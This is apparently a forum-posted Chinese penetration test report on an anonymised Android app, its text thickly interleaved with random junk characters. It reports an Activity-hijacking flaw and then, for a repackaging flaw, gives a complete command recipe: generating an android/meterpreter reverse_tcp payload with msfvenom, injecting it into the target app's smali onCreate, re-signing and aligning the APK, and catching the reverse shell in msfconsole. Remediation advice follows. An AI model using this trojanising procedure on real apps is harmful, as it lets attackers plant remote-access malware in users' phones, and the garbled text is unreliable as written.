& f2 M2 Y6 Z- W7 w$ r1 r) @ $ ~% v2 t$ h+ i& l( q! R6 c   & C; ~! B! g/ z7 j 7 l3 m6 Y% {! Q

) Q4 t" c) Z g- o, }* ~4 M5 R7 I 2 \ X2 j5 l$ B6 v' s7 `

6 P) y M" k2 U% \ & S! E1 R% g) V3 S& S 1-2 测试结果 $ C3 Q" f7 t/ f( j) W0 Z " R0 h; \ L. x7 {

9 `' b. L a3 } + d0 z' i, l6 n9 R

1 p* g6 l0 e; \3 }1 J 9 w) R6 H( u# |# _# I   ) `% X/ \+ x- t% ` , C& q& N& n* _- U/ {

& r* Q/ T/ `/ C5 A8 V : X# e2 Q5 S9 m/ p5 H% N8 ?3 [+ G4 P

3 `% [/ x1 A3 A * v( R- E* X0 X* z2 } 2 检测结果                    ! [$ f1 ~" M& Y5 a% v$ D " k- k6 a, J/ O- f$ O

7 H1 O5 H. u, B' I; s 6 i) ?, r- c! L5 k

" x# B3 l* g1 [ / G6 d' y+ K: g 2.1 某某某 ( o" ]+ N4 A- B& h P( ?: L0 h2 j; ?1 s- u

/ M' H3 [2 _" t8 C * g( z5 p$ k/ {, K

- H, N. O: ~* k/ V. F8 \, H ) D6 k3 M& r3 h; `" j7 R7 F* I0 ~ 2.1.1检测目标 ! k5 G8 p, Z. M4 I/ x; `/ L, N- k' e: [' d( ^

4 P3 q1 M3 T* H$ u 5 o+ m4 I0 K2 W b6 [' `1 L- t

& E+ I. Y! O x. o2 t 9 ^" H ^7 n. T4 `; i9 `5 n 目标地址: 某某某某某某APP ! C6 _$ |3 b0 ^ a4 ^ / M$ G7 n; b9 m8 N! [: G4 F2 s- D

6 I; R% c5 o$ e p. M% o " B8 j' }" ]+ B' J" k0 a1 H) D

$ y) g: W0 ~, ]: ` z2 Q A6 P, p) v2 @- ^$ g 2.1.2检测结果 ( s. s# H9 m4 S1 T& }: ]; h* D * _0 d# i+ l% z5 y1 U2 Y

5 d% S, V* n; p% [& l# m2 G' |! {) q, o, G i/ Y

) R1 N+ }" F3 j/ ~5 Z; V # I$ g7 Q7 g; {9 ` 2.1.2.1 * @3 t+ G1 s0 ^/ a 1 f7 o9 ]4 s2 X+ o& P

, u+ T, L" W: e # L& K0 Y% m/ A1 R7 o/ R6 Z& w; }

4 [ n a( w+ P5 H, i) N0 b- o. o8 t9 W( B1 [* \8 ?, G 漏洞链接地址:某某某某某某APP ( |" ^4 ]$ f7 h" r) m+ T& _. D7 v: B6 v! g3 w! N3 p' c

( [# c/ R% A/ U: h3 l 3 j0 G, V) R9 M- s7 U

) B$ ^/ W2 w5 I7 i3 |- ~, o6 [( \6 W0 i+ B: `! L' d2 z. V u) Y1 m   9 X: m' V8 `6 }: o 2 s. c6 P* Y" j, O! U7 J% ~

8 ?/ U. Z6 l X( P' C / Z) p) K" y9 i0 U0 J* _

6 U& H' U/ W' Q 7 Y" J n) ], r2 g7 x+ x" q7 b) X 漏洞分析及取证: * x4 _( K! J% p' ]# e& w% t3 v' ? : E' d5 h% F% v, N: ~

3 A- [0 ?1 i8 @( c8 D2 v. ^+ X 3 F% w M9 N8 d G+ d4 I) k" q

8 ^7 S+ k1 w3 w* K2 B k8 D2 r: m                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: / o( V% b* g. m: B6 j( t* e3 r 2 r/ m; o: _. a8 h; o

: K- W4 A! [6 b0 k4 H2 y 1 ?! t- }- j' D) L0 I

: y; @- q: @* ~$ p5 H" {' r 1 l0 w" w* e; g      " Z I- _% Q' s" _3 }: w }' |+ D2 ]0 e" w4 |2 l

5 E. W X$ m/ t. C$ T7 R$ i* @) ^8 Y! V2 D

( d4 a; \: U! M* v9 g , c* ~* f& T! D0 J' g/ t                       7 X0 ?; Q9 Z% g. d0 E + D7 u% J4 Z, }7 i) k

, F7 ~* t; O) S- W4 c5 c; \( i # i, P) Z) h$ ?

/ B% `! g9 O2 `2 B ' I4 W% R* C9 D 8 }% b9 x1 N) o5 U( H ( o: p8 `1 H/ O8 ^! O. d

4 t& ]0 I# s n6 c 2 M1 x1 H1 `2 E2 D' t

- d& O! y! c1 v5 t ; S, f0 m6 S3 G! ], W2 Y1 `3 r , Y: Z& f9 R: J# X 8 a7 G1 |! B$ i

0 P, m, u. k4 n) f & G' V# G1 ?: W9 A

& _( h, k. s; v7 o: S; O& A ) }6 [" m) I5 v, Z/ F, X/ X. B : F/ E( u! L2 v. s1 K- \: R h" L# K1 S: e# D

, G Z) K! a. L # I" t: Q, c0 y! [0 L

! A1 {8 d3 g; W# V , T+ _8 S& x; ` 漏洞危害:高 ( R; q% \. Z$ u d( J9 m 4 ^. w$ ?3 \+ b w3 X

' `. Y4 J. A( I) P O% {6 {! Q1 ^- \
5 c4 K/ R; j: h- s! d& M4 G+ R 5 S; k, k8 a3 I6 Q E+ H ; b* E& ^& L& E, O# a* A" m6 c+ I7 P5 u' }6 K; ~$ d1 z1 Q, a& O2 l; v8 @- K4 b, U' m- j5 G7 g& I0 y' d; w2 S) n8 L" {* r& L) R7 R% m, U V3 z7 V, K" \3 U# d3 c) ?6 a1 v# P( s1 ^& o% y/ n7 `( ^1 r7 ?3 e9 L+ o% H) ]" x& ~6 ^& n! W4 y) q" F9 W4 k5 Q+ L8 Z: ?/ U" x- b. J" B* \; m" Y# T; w, I, h" ]( a3 ^+ T, E; m7 b$ `% q) ^! t; K2 A, w0 T( j% y7 L. y8 L9 g& m( T e: q' C" C' t# s7 C. |" g8 r# n9 r, ]! B6 ^, K7 Z' R& e! ?* o6 k' W2 y+ e/ M/ k+ D. l% m0 r, R3 l3 A5 E1 U1 z5 l9 G D! A: m' N- R; B' }2 D3 U- r# N2 s$ u' I2 f1 ]4 g/ y5 j" ?6 b2 G# S3 |& J0 ~ Y( S$ O# R, f* Y) T5 S! t$ x8 {0 X" t
" p) P/ @1 ~3 h7 s3 q) |) \+ g3 I+ @5 |# k5 m

5 @; O4 J1 X V& ~ 7 m' c2 A( v, C: Q I8 P2 } 严重程度 . q p% {8 t2 @7 K ' I1 z7 r" v4 c' r6 B

0 r8 i$ K- L1 V) [# _- }3 }+ |0 p 2 u8 U7 F' W2 Y- z* h/ _
) N% m5 }" r0 M3 d2 l+ D; _ 8 O( {4 b' O& B! ~; M

( d7 T; e- j6 A/ Q' D# O& s t* E2 |# H5 y1 } * @8 Z8 Q7 K- B- l+ i7 ]) O1 y " a0 j l5 \2 p9 R9 r* S3 N# d

\- l$ U) t# ~ ) C$ q; B) l: {5 y3 L9 u- H4 e# c
- c3 P" S4 H1 g" B+ P $ C# G0 G( H/ x3 Q

7 ]) F/ g5 J1 |& ^ p. e0 {/ Z2 o* I, `0 ~' t 9 M8 r$ s; P2 j- ? z1 L+ k- T# f + p- _7 o# }; E

: H# d2 ]0 O5 y" z- k0 D' L 3 [3 p, B9 a4 b% V# @& \' l
% x6 ?, p8 M( u ^* q+ S; w* c! S# o; o/ l

+ k# f1 h! A. M" K$ L7 P9 o { ' d4 L& a) i3 u/ q" R3 u* V, B R& @& |! v6 o ( c O5 @) o7 e2 T- K

: P4 L+ F8 d( M v( v8 Y- _/ B4 n 7 X; o2 a% C% V' K
# q$ }" y+ G1 o0 _% Z8 Y% Z . H( o. V0 k: B F# V: k& V

2 f |' @+ A+ d( \ _' x * j3 R$ K0 y* z   1 p8 L8 c0 x1 p! p: @8 k: h4 ] ) P" S f. \5 M, p

( K: `9 U; B8 ]4 U o - Z# O5 _6 f, _0 A$ S/ ^0 L
/ r9 v2 A# K9 H: f ; O8 i8 {3 a- n; A, s2 S

6 h+ X" U, U; v* D0 l2 b ' D5 I! L, S7 F k * d+ U" I/ _7 e5 x8 B 3 m6 V1 D" D( g) K8 h

' s- N* ~ ~# v: ] 6 N6 P+ U( J& E$ T
. @. @: J- L0 }; k% { 7 V, Q( v9 d, s6 d

1 V Z" B: ]; k8 C) v 3 p4 S: d: [6 j6 T) V   + c9 O1 F+ T9 M# Q) l" C8 K' o, P2 @9 n: G# w& B' K

+ v2 L; W2 m& E- ^1 R$ |/ q+ C0 a4 d ) O7 i W8 a# Q, x6 q" M& T! c
' M6 f$ C7 V- v [0 U" ^ 7 {0 P) O+ }5 h4 n. e1 s) J
! k, \! ^. G% k7 E5 Z; A% v 0 t% q# q2 g. S/ R9 D

; j3 U; m! H; g. b) \( n3 _/ l8 g" n& T; H7 u9 e   9 O! x' F# Z7 W% p 4 o7 a2 x+ H- D g

/ U1 Y3 R4 a E \6 E7 x2 S 9 t" S* z8 Q2 i+ E9 Q# O

" l4 _6 a7 a4 A& u& K- r# t$ D! N+ A& P 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ( }% p$ M# G8 x; n( `9 S& ]) Q, _0 }+ n d% ?0 k9 K1 i, ]

6 Q* X/ r0 ^! \/ Y 7 \; h' B# K$ Y( v; X+ A

+ w" E) d: ^0 o' U7 M( s' [ 6 e$ `" z, `# e$ T6 q           ) \9 T, s+ {8 g& L- T) K" G . Z& p% L' ]% I9 H

# s$ _0 e& C; Q; h. F# Y* l# e ' K0 |4 ~) ~! ?2 x% C; C

9 T9 W0 A. ]$ B/ W& ]/ L$ Q 1 Y7 Z8 y2 b4 e/ q/ C3 _8 {6 k   0 ?; ~/ w9 q( b P2 z# X. q( `. ?$ e: W

) _+ ?9 Z* q. N& z, G! K: e" B0 f% U* _6 C# R# D

4 w; V) \* a9 f/ e4 v * w. [# J# ]9 i+ J6 B' m9 n 2.1.2.2 2 B" t! P0 K7 U8 w% u2 ?" M, W3 s& r4 t b4 W$ D7 _

, x- U0 M+ V3 f% J" Q7 U& S" g* I4 }- ?, g: i8 V4 H

6 d# f' I2 t6 n; @, v; V' O ; L' e; f6 ~& k' N8 U4 m5 I 漏洞链接地址:某某某某某某APP 7 Y2 X; h, ~4 Z+ T5 W3 x* F3 E, O! m8 q% B" w' L. o! n( d

" m3 I& d9 S; G" N # [4 T/ }: {- C2 z

( _2 `, l& F" J5 R5 W. n 4 i! H5 P$ L+ T# X7 e3 m) o) ? 漏洞分析及取证: n; ~: u; N6 J8 J' G9 t. R5 x, i# m7 t2 A4 ^; Q

3 y& k- x8 d8 j ( N7 {/ M" v) l' g6 H5 j

6 I. D4 H: c* D3 r; H0 x# Y8 `+ `- \8 S% J6 Q6 r: G                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 4 ~ c- h- y* e8 O' d( f; Z2 E; J$ N / |8 U. z7 t$ \( M$ h' [+ p+ ~

) @1 R3 f3 v" ~, a W' r5 C ; K, W: i6 z( L7 g9 R: ~) G8 w+ T

0 p0 k7 e5 i i: W; g4 i 7 h0 a+ |( z. ]1 z# y l1 u2 | Metasploit 生成木马 apk ( |- o, F$ L1 H ; ^7 v5 H5 f! c: ^* E7 V

* Q3 s$ N: O, e' B; B4 b4 N 0 [7 P7 X0 D) U6 m4 A- K0 v* G

3 A( R1 \; u& |7 ` * }3 w. J8 \* O; o! j; u msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 2 w: L4 C8 z, o : z- p9 r- S% N Y

6 U' _& j0 U: r! h: r : K' V, @4 m& h% w0 r

M' X0 Q4 L$ C) ^" L- L! o , ~' T0 @ ?# a# i0 a$ U 反编译目标apk和木马apk $ g3 d% e) |% t. d5 Z ) m4 e; L# t" n# s* t, T6 z% ~8 r% @

# `9 k( O. |" K6 P , M6 C# V' V8 l

: U( O3 ^4 G+ u) x! b3 n1 `0 U) x- J! R1 d/ x% ~+ d apktool d target.apk
5 w o# C, [' |% b3 I" | & L& D$ p L. e1 J4 P4 u1 L7 h apktool d cockhorse.apk
) g8 q% d+ E* f1 h. t- T* X) m' x) O* }- [9 I. h

: [0 |9 N Z+ q3 Y 4 V+ t0 R& t0 i" T' d

. e1 Z q% M- y - y* [1 f4 G% g+ Y5 u 木马 apk 注入目标 apk & i+ G2 C3 v' x7 l) n8 y P * [/ t% `" [( ^6 S% b3 r4 o

6 l) ^; m1 c# L8 T4 H5 h7 `1 x 0 ^: ?. A2 Y* P

" J6 R! Q' N4 F: g! c ( K% O; L0 Z2 O5 ^ Q0 b 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
- t7 [# i1 Z0 G& T " H; h; A9 A0 j! D3 x invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
3 s; n) |0 @7 C " ?+ u, {3 g* ~0 l( t) K% r

, l/ z: G$ w0 L- _; T 5 H3 N& F6 A2 j; b) z4 T

2 |0 c. X' Q+ q( _ 2 U7 c( e: Z6 o2 H8 Z6 O+ P 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 3 L1 S( V* l) R / K, L$ F( _% W: I% L. z/ f

3 ? @/ _+ C$ [& ~ 0 G/ I) N) s- J* ^( Y/ u

, X* T0 l; N: h8 X& J* Z; W P! ^0 D 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ) |) p- A1 U9 |- ^* c9 p8 @& I1 L& N; }- ~" k9 l5 H0 o0 A, Y E& j3 v

+ S+ f& [2 L9 l5 n( O & t+ I; n T$ |) D3 Q! j# j5 ^. r

: `5 f/ h: b) P" z$ c/ v+ K( Z4 f/ f; q' |4 G/ m 回编译生成最终 apk H" j7 J& A9 E* M: t% y1 G. W/ \ 8 g) `) I9 \& @) a. Q3 r) c

- ~2 }: h; c) S/ ~3 D( J 6 T) k* e- k( E. U! |# [. k

( W* V9 j# E5 |" ~( [( [# w ! z; h" e* Q8 w3 Y1 s3 m 重新打包 : X$ {; r7 W. h( x ) W! ]5 S! _) W! r. n! ]

8 b2 Y9 v! D! b8 _ n& e" W1 ^' D& S! n6 }

9 P- R/ V8 R, X) Y& Z , W8 P8 {. V: U! X6 M7 L# N) H apktool b -o repackage.apk target_app_floder , ]8 A% c" r( M , y: f6 I$ t& I/ _% }$ q* |* n. n2 i

" G9 Q1 F/ q4 H( E0 E# p$ @3 W! s; U6 C' @$ C) k; D

/ e3 s3 N' |% j0 N6 `* V4 l6 Z5 X; Y% Q* w5 Y 创建签名文件,有的话可忽略此步骤 % }& X3 u+ p% L [; u 4 d2 ^ b7 F. D/ l1 U& b; Y$ q5 H

' V7 a9 C }4 j7 X: ? ' E1 C% r! V5 v( J6 q! M4 k5 {: |

/ ^4 h1 y! [ _; \. `/ `, t8 P; { 6 q6 j0 e0 ?$ y keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ) G2 Q! ^# d5 B2 r' G8 V + l) L" J' k9 c7 F% i3 ?2 ]) d# u0 \

+ N, o( W. O; M6 } 7 N' W2 D% W z+ Z- O! _2 f; s

* s# R; f5 U) _; r, M6 ?: ~ % ~4 U5 g% T2 E; @7 ?( C 签名,以下任选其一 6 X& [& U9 z) \4 m" e% R# R4 _0 ]# `5 I1 k5 A

R, U4 q4 Y( R. ?% j- N , r7 }( f& N4 v3 o0 R# |6 P

7 t5 r) _- w& @, s9 p9 R - B5 P$ }% O6 M% ?/ I" ? jarsigner 方式 0 S1 m4 Q9 Q$ o/ ? $ @1 K g" [$ g9 g- F% n+ {

6 K! c+ h: M8 c, z U/ t) R0 h H$ O0 S" {' c" A

" t7 d" u+ F- B) D/ |" j2 P5 \, u, \ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname " d" d/ X# \; T# S4 E& |* t ( M5 |0 m) h* A8 P

4 j* R p& Z0 k) e + t0 y6 ]& l# {, z6 d% L; j

/ T \3 u* W/ k; S% u- p) w& G : S# X7 k: p) l1 S apksigner 方式 * u7 C2 I* g0 ^ 3 c' t% y: x6 \. D9 s

! K0 D t& Y1 i7 N+ ?+ f' c ! u) o8 s0 W) B9 n% f0 M

+ N8 D% q' M9 f) \ & X) |9 e: {/ A+ Y) i# V- ] apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 7 ^: @/ ]1 V6 \0 X( q 4 J2 O8 x2 i# l/ L- M4 K' r! y

. v# H2 W: s: B! t( R9 p5 E* D7 T( u: p# l) R1 b) t x

1 w {; _/ M$ c% Y5 m9 M 3 c4 z' B" M+ L/ @4 Y& C 如需要禁用 v2签名 添加选项--v2-signing-enabled false : [/ z* @6 @' |/ @# n+ |, v 1 z' |" k: U8 z! g& l

! X2 h+ U9 {' W* x, ~$ Z Y+ D 6 Z+ f( i8 ]+ I2 J: O

) t7 }2 `! ]0 ] ! H* Y; g* M7 T/ s, @) q 验证,以下任选其一 0 I: V$ ` Z4 D6 u% Z 3 P0 _ [' s9 p" i o

. T/ i( Y2 m/ c: Z( b 7 f' u+ ~# L, V

8 e& `$ B2 }4 M* t* R 0 S/ x& w. ^3 D& u( e$ z jarsigner方式 N$ u+ I1 `. n/ M1 c6 E+ r4 u # H& ?) k% P' V

7 j4 j" k. a! J; h$ k0 T; H ; V; Z( U1 s9 t9 u/ G5 ?1 y

* |: `- Q- g$ N % j2 l( ~4 B1 z# D+ G! E$ e jarsigner -verify repackaged.apk ( ?- d0 P/ @& b& g, E( X3 }$ e % f/ e( m/ l4 U# o

6 Z# m# N5 ~5 R ' ^. P; [) W/ [

' X: s& i- ]* B7 ~- C3 ^- [, \2 [ 9 r" a' F6 N6 s apksigner 方式 5 Q* @$ C7 W9 s8 X3 `5 b, f/ } . T0 A6 Z7 b U* x! `

9 Z% C5 R( _* H& n, A/ M6 ^ ; r! g8 h4 k, {- ?8 c; {

9 T8 p. j: f1 E! a1 @' I' W6 F ; ^- k! f+ m- K4 ?, l apksigner verify -v --print-certs repackaged.apk ) V$ U1 B. K" z7 W) F w7 y0 `: a7 ~) X

4 o9 x4 t! J2 V" S0 ~- K - @6 W9 }( a% m( C- N# e1 w L

1 Y+ T4 f) `" Q/ E) I( l. x6 C% A4 n# K% J6 _+ S9 N$ O keytool方式 5 K7 }# d/ \) V) {3 i5 E3 e3 ]. y ) U3 b! H$ X/ B' }4 Q, ?2 t% |7 L

% u _ J2 L2 y & s6 b G* M% O. z3 v& _+ n

% \6 ^9 w' _$ r" t2 v: |# y " d0 x* G$ |5 Z) o keytool -printcert -jarfile repackaged.apk , U$ ]0 d. J9 W8 g9 q7 k # B4 u: m7 T0 C% ]+ l L

5 n4 `1 Z& y7 A$ k$ H( U6 d" m/ x& r: |8 B& q2 Y

) ]. t& R& a5 Y 1 o1 k( F8 {9 u) o( v9 } 对齐 3 u9 c% b+ |, l9 S6 U, z1 a G" y4 {2 z2 U& B* N7 k

& l3 B) @* z T2 L* j7 D0 h+ l' h& V/ B

+ z- K4 O; x' D9 }( b" c9 w 8 l' ?6 e2 ?- \7 T: n) o7 } 字节对齐优化 7 L7 y/ M* g. M, |. z7 ?$ G 9 J! H# `& B) h) P

; r: A/ o$ n, a% E. T, t2 Z 8 J; i8 l1 g# {! B& c

2 y3 f- B6 D% x, F6 y; y' `0 E* Z! U* m! _/ @5 Z' u: j8 m zipalign -v 4 repackaged.apk final.apk 7 ?8 c! J0 H' H/ _" ] ; G5 D$ T* a( A5 K$ I* z& [9 S

* }! y, _9 f# ^. U5 ^ ) u% j( u: ]6 ~! E( U& q

1 ^" r) Y) O! q' H( ]9 e 2 s: U$ ^$ U& P 检查是否对齐 8 @" T) o. b* o & q+ }; c( t& q3 x, O. o. g8 |

3 ~+ i! U2 S* I1 y) k+ r2 W/ `. p 7 n( @- @. x+ u* P6 l M- c3 o

8 B) W3 D: E i/ K % s/ |: M7 N4 F9 v. t \ zipalign -c -v 4 final.apk 3 ~ F* i+ S! k * R8 u% A1 `, h; e' z' F; |- u- l

- c& ~( r+ i6 u! g2 n) R# a ~ ; S/ W8 R( w9 E* Y3 q N

% {; |% C3 x2 e0 I9 } 3 ~$ k6 _5 t/ f g 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + U, _, N$ m2 C0 C- @+ v $ U# q; n# E; [$ i8 `

% h* ^$ a; q) P8 e1 G/ n- N" t5 P: }

2 a, O: f( @/ E. B " S$ K L* c6 b. J$ u* y 启动Metasploit控制台,配置参数等待上线 7 j7 L5 {. m' p- p# o* G* a0 B: L7 g; A * x; [% |) o0 ~

4 x( o, \7 M5 |* K( F! b0 s" p/ C3 C! U' c+ T" g+ ?

! N4 z1 B: e4 y8 \& S6 S ; A$ N9 u8 s" x3 Z( ~ 在终端依次输入如下命令 . v( ]; w {* ~2 `2 |1 ?- F) c 6 \7 o, Q: p+ V

: l9 I7 L' l$ |3 O9 I8 d+ c 2 V/ i) O% K% z6 ^3 E$ \

3 H. W3 U: {4 r. o5 O* B v+ s) t5 N/ D& d+ V) ^ msfconsole ' _8 L5 M( Y- g) a 3 L) j* K& ^5 n( T' M

4 z7 |. g! C3 X. O 9 l3 G; P5 {2 H: E& c' i' j/ \

6 s% U; }2 f$ K- N& y9 ~) l ( \, F( O& k) Y, W+ Z8 ~$ ?" E9 N use exploit/multi/handler 5 e/ n0 U6 M; n$ z5 h $ N! `( j0 p/ a& k2 r N; ~) K; a

, L- F; M4 h' e/ ^- r* L. }: o 1 B4 t( f- y& S

" w: M5 ]+ P1 {) _/ S" V* {% K: K ) u& k/ b: H) k! i set PAYLOAD android/meterpreter/reverse_tcp $ n* k( D5 u* H- J6 Y5 V& U * s- q/ i N8 Q. {+ Y' _( U& f

2 A" D3 u. ~. \ ) _, D; p S: l$ v* E. Q" x

" h" [" S0 J4 ]& L 4 o/ P+ Q3 Z1 v set LHOST 192.xxx.xx.xx 9 F' o4 M5 `' r2 t' V) \, V3 u' F

+ t6 _: ^4 ?& r' x P9 t : i- T4 A6 m' M0 y2 r

) o- N0 o: z! n$ G( v) v . o3 j, B9 ]" X' ~4 b set LPORT 4444 1 M" B' w) n I) y( V# e. W$ B 7 F' g8 Y; F0 U9 O; z$ ~ t

4 A' _3 K- n- E 6 q* l& C1 I; t8 q

$ ?. K7 E7 @' g 2 h% y! o9 f2 w$ q- G0 i2 W: r exploit ' R, g8 e, x8 \4 O2 H $ g2 _9 x5 a+ J+ M, k, }

: S1 L# e& b$ U; P; _ 8 @$ U4 J( T3 Q3 j

8 p2 C6 w0 Y/ y V+ A h" a. m+ {9 B4 i4 D# P( ] 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ) X/ ~. c; i5 W$ B K2 h( d ! M. }' }7 w: P8 H+ w- {) F, c

, w7 F G2 ?! g* i 9 z- u3 j! u/ } o3 H+ l& A. A

6 c' E6 Z$ q! k% h % ]! u! V* u ^. u; i" F 漏洞危害:中 R/ e4 Z# c$ t- e3 `* [4 c! C8 a ' _6 L& G; |% ]! {

0 H% j/ y* J' A1 a ! s' X* f q5 W- f9 X) @# q
! A3 t. a7 X {9 {, w8 O7 P 8 Y! B! ~) T! l - ]9 Y) C% I! M" G6 | & A' R! c8 x* l- X6 {! N * f6 d, K2 o( e! e0 u! ^; U+ J4 j2 G3 [/ E0 l' L% [& R& h' U- V4 d/ V1 Y0 I* Y& l+ r+ ]$ d4 j! d% E5 {! m( [) z* k8 ^% b9 V7 k4 T+ {) I# r) w7 a* z/ y# R+ y/ U6 ?; L1 i- R: n8 G1 U, ?( f! J: v: T$ U9 a x! w" z2 y$ |) ~( Z3 `0 j- \9 f- ^" H2 b/ Z: `) H( w2 Z8 K: K, P: N% \# {, b+ [" }' |" ?; x9 p k4 I* \& G+ I3 x) v7 J) E0 c& s: N5 a, A9 `* n8 h+ }8 u3 L2 ]; G" q+ O0 \: ?" Q4 ]1 V' T! i( n9 I3 J3 l, F, p* A% F+ @7 U/ N& V7 Y7 D) o% Y& U9 `6 D) e3 b$ I9 [7 `# K! u* j2 g% q- M3 I+ Y z0 u5 y5 f( Y4 n9 a4 }/ ^$ `, T+ b2 k( G) D( Q2 ^, u {9 d" I+ E6 K2 ?8 J; N' x7 ]- ^" ?6 E
8 u& L7 D U; w9 n ( S! z, q" m/ m$ p2 T4 ~

# T( |9 q' O: u! J$ N 6 O3 |( D$ k" d n3 u 严重程度 # ^- A8 w" C0 D ; r9 u" z- w1 }5 U' w3 h

7 E5 B" a( M0 o) g8 ~3 b ' C9 m( O2 n- A# i' p
( @6 P1 U' i2 L3 o3 \ & F! G" |4 I- O$ l( \, V. L$ Z

9 O# L7 s7 b/ a& t + g# ]0 [9 k: Q" S: B, U$ f# y' n( I / t9 }( U; i$ Q* n, M$ N! F* w 3 e: { R0 ? ^

7 R# C6 [( M0 F x ( G" x4 h- Q# a3 q
7 n. D d% ]5 \: T, f7 n 0 ~) E5 } k: K

& ^8 o6 l9 V. T2 d. o, N \+ {" N: g o( g / J' h6 }% j N: N+ l% [8 u2 b / D' E- x! s$ @- \0 o

0 Y! U1 ]% W3 [1 l, Q/ `4 \ 3 |' J1 L8 c$ L
$ n, \6 O, ^ R& I : f) S( F& A- r( `+ a: z

/ Q8 u/ G) L. m 4 n5 O" r0 N3 } K, C 3 W- T) v7 j$ i3 f' P5 b) F ! f$ t" U' P/ G1 l

7 W+ b% W- m& O+ H8 L2 t& ] 3 x$ O6 a8 f9 h1 E6 f
* N! [& k% x ~/ u) E: m3 i) d1 c o% x8 K6 E6 B- H" [( }+ x" f2 U M T$ _9 k

, S- \) Q# b4 Y; m0 z: T9 _ @! d5 m$ S! ?3 t& q   ; Z/ C) T( h; z! y9 m! }( h" M; Z5 M, W, u7 ~2 a* [" Y

* }3 u2 U/ \% [2 ?6 _5 O8 K7 \) x* N1 I9 F0 r' D
5 }* g6 q K) u+ j4 E0 \6 p) q5 {2 u 6 e4 C; k' O3 M6 {0 r0 i: ?

8 x. s8 t: p& @0 Y 7 d2 \; g+ E4 X/ f8 w/ K$ s/ r7 l 9 a" {; N6 G6 f1 c7 K3 j # T s. h' F: o

) Y! v& x6 |- }# z! V: ^ 3 Y2 J9 T8 \1 O- ?/ V: M: f7 W" h
9 g( C% w* R$ e" J* b! l . n+ R# I4 H( {( G. d0 r. u3 P % {( d/ I! m' w; x8 c: _% r7 e3 V% ~" p

; M7 P" C M, }- b1 s' ^& s; W0 Q' n- L0 r/ }* X2 o1 v3 l8 O   4 ]1 c" c& ?1 p/ z $ v/ l! q0 _8 t# b F# x

2 a( s( O7 H6 H, D/ r8 ` 8 ^5 k, S' M, n7 l" H1 n4 m8 R; k
; l9 E4 U. Q8 N/ y( X $ P$ c2 l, M, h% b/ t3 u- `1 }8 Z
2 d, j, V2 g# ^; j + [5 R+ b: x5 r7 y

4 ?( Y- Y* U. u/ |& o/ z2 Q / T' T; O ]( W7 d9 s2 a   1 f @8 [- F! B0 n( r9 a % o, E: {" ~( [! W# T- f

, P- G# R+ @. X d5 _5 d 9 `# W B, x3 r; s/ q8 z

0 e. w) @2 S7 c0 \ 3 }9 m: L; @7 V o0 B& D) y% [+ i 修复方法: ' j: \. z8 @( x) C! \$ K/ J3 ~ % Q/ B4 E3 S' i4 P" |+ W3 ?- h

! V1 O9 p6 ], ]: s# M& U6 V' d8 X* d+ _4 a( c$ A/ i/ }

% `, Y1 ?& _) N4 J" u% O. f' {% O$ w) Z! I1 `7 q               1. APP 启动时应做签名校验防止二次打包。
0 S8 I& t/ b2 [+ |8 ~ {6 Q) O, b6 D& V9 ` A7 _ 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 - Z& x3 ?+ c" t+ k ! E6 r; Y o% o1 O& s. h$ p" g

0 l/ o8 X! Y. E8 \! Z- S j& X1 m! M" E: d8 M' b1 i* W + I6 c+ e Y7 n' Y z: \+ [* Q0 k7 r. e8 ]9 ^

8 p7 z8 a3 @/ t* C( n" ]; P2 C7 z 4 a4 p, ?% u( f" ?+ ?+ B   4 b |/ l9 U, D1 D9 w' B8 o( q. W) I0 Q) B0 g$ j$ w

: L& c% ?; z7 k v2 l' I' M& l \' f8 `# H% p, _ ; z3 c U. H% n" \ . m0 K- ^, ^2 n; e6 f) Z

! n1 c3 A3 @0 i' I) M! | 8 p! g* }: ^5 B
+ A# Z0 e; A1 }, ]2 i 9 T/ \+ z7 @2 K! Q+ N# Z

; B7 }& F) |6 @( F! Q 9 L. y+ q, p5 P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表